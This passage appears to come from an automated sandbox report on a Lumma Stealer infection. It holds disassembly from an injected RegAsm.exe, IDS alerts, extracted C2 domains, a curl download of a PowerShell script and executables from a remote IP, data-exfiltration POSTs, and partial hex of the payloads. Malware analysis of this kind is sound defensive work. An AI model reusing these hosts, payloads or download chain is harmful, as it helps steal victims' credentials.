                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_004299B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]7_2_0042526A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, edi7_2_0041D270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, eax7_2_00423A34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h7_2_0043D2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, word ptr [eax]7_2_0043D2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx7_2_0043C280
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0043AAB2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h7_2_004252BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h7_2_004252BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebx7_2_0041CB05
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax7_2_00427326
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_004143C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]7_2_004143C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]7_2_0042A3D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, dword ptr [eax]7_2_00436C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]7_2_00418578
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax7_2_0042750D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_00421D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, edx7_2_0040BDC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]7_2_00417582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]7_2_00427DA2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h7_2_004205B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl7_2_0042C64A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0042AE48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax7_2_00426E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]7_2_0042B4F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0042B4F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0042AE24
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_00433630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl7_2_0042C6E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]7_2_00425E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h7_2_0043CE90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_004166A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_0041BEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0042ADF4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, edx7_2_0041C6BB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax7_2_0043BF40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]7_2_0043A777
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]7_2_00409700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]7_2_00409700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]7_2_00409700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl7_2_0042C726
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl7_2_0042C735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebp+00h], al7_2_0041DF80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]7_2_0040D7A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]7_2_0040D7A2

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.11.20:49710
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49712 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49711 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49712 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49711 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49718 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49714 -> 172.67.207.38:443
                      Source: Malware configuration extractorURLs: awake-weaves.cyou
                      Source: Malware configuration extractorURLs: deafeninggeh.biz
                      Source: Malware configuration extractorURLs: debonairnukk.xyz
                      Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                      Source: Malware configuration extractorURLs: sordid-snaked.cyou
                      Source: Malware configuration extractorURLs: immureprech.biz
                      Source: Malware configuration extractorURLs: diffuculttan.xyz
                      Source: Malware configuration extractorURLs: effecterectz.xyz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 16:33:56 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 12 Dec 2024 14:33:42 GMTETag: "b200-6291399decf3b"Accept-Ranges: bytesContent-Length: 45568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 ca 14 bd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 08 00 00 00 e0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 22 00 00 e8 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 16:33:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 12 Dec 2024 14:31:40 GMTETag: "47e00-6291392989375"Accept-Ranges: bytesContent-Length: 294400Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 ae 00 00 00 00 00 00 90 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 fb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 dc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c fd 03 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 cb 03 00 00 10 00 00 00 cc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 e0 03 00 00 22 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 f6 00 00 00 10 04 00 00 50 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 10 05 00 00 02 00 00 00 42 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 39 00 00 00 20 05 00 00 3a 00 00 00 44 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: GET /infopage/nghp.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /infopage/ilk.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
                      Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
                      Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49712 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49714 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49711 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49716 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49718 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49715 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49717 -> 172.67.207.38:443
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.11.20:49710 -> 147.45.44.131:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49713 -> 172.67.207.38:443
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: immureprech.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QP2EQTZBZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20488Host: immureprech.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C3LWZ7G84HI7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 10903Host: immureprech.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UADEEVLT2AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20520Host: immureprech.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2L142YZ0IX4WKDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1256Host: immureprech.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QOGKQY9Z8PPSYK8TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1047224Host: immureprech.biz
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: immureprech.biz
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: global trafficHTTP traffic detected: GET /infopage/bgfi.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.55.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                      Source: global trafficHTTP traffic detected: GET /infopage/nghp.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /infopage/ilk.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
                      Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopag4
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopag4v2
                      Source: curl.exe, 00000003.00000002.4069751364.0000000002FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bgfi.ps1
                      Source: curl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bgfi.ps18=S
                      Source: curl.exe, 00000003.00000002.4070019768.0000000003180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bgfi.ps18O4
                      Source: curl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bgfi.ps1V=y
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ilk.exe
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/nghp.exe
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/nghp.exe4
                      Source: powershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/nghp.exeT
                      Source: powershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/nghp.exeTp
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.448
                      Source: powershell.exe, 00000004.00000002.4110820466.00000000708D1000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
                      Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
